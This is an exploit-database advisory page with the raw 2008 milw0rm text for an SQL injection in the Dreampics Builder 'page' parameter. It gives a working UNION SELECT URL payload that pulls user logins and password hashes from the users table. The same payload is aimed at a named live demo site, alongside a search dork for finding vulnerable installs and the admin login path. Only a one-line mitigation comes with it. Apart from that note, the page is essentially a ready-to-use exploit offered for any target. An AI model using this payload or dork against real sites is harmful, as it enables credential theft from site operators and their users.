PICS BUILDER (page) SQL Injection Vulnerability

vendor:

Dreampics Builder

by:

Hussin X

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Dreampics Builder

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

PICS BUILDER (page) SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable page parameter. This can be done by appending a malicious SQL query to the vulnerable page parameter in the URL. For example, www.[target].com/Script/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

#########################################################
#
#     PICS BUILDER (page) SQL Injection Vulnerability
#========================================================
#    Author: Hussin X                                   =
#                                                       =
#    Home :  www.tryag.cc/cc                            =
#                                                       =
#    email:  darkangel_g85[at]Yahoo[DoT]com             =
#                                                       =
#=========================================================    
#
#    script :  http://www.dreamlevels.com/dreampics.php
#
#    DorK   :   powered by Dreampics Builder
#     
##########################################################

Exploit: 

www.[target].com/Script/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--


L!VE DEMO:

http://www.dreamlevels.com/demo/photosite/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--


Admin Login :

/admin/

########################( Greetz )###########################
#                                                           #
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke    #
#                                                           #    
#         Iraqihack / FAHD / mos_chori / Silic0n            #
#                                                           #
#############################################################

                       Im IRAQi

# milw0rm.com [2008-07-09]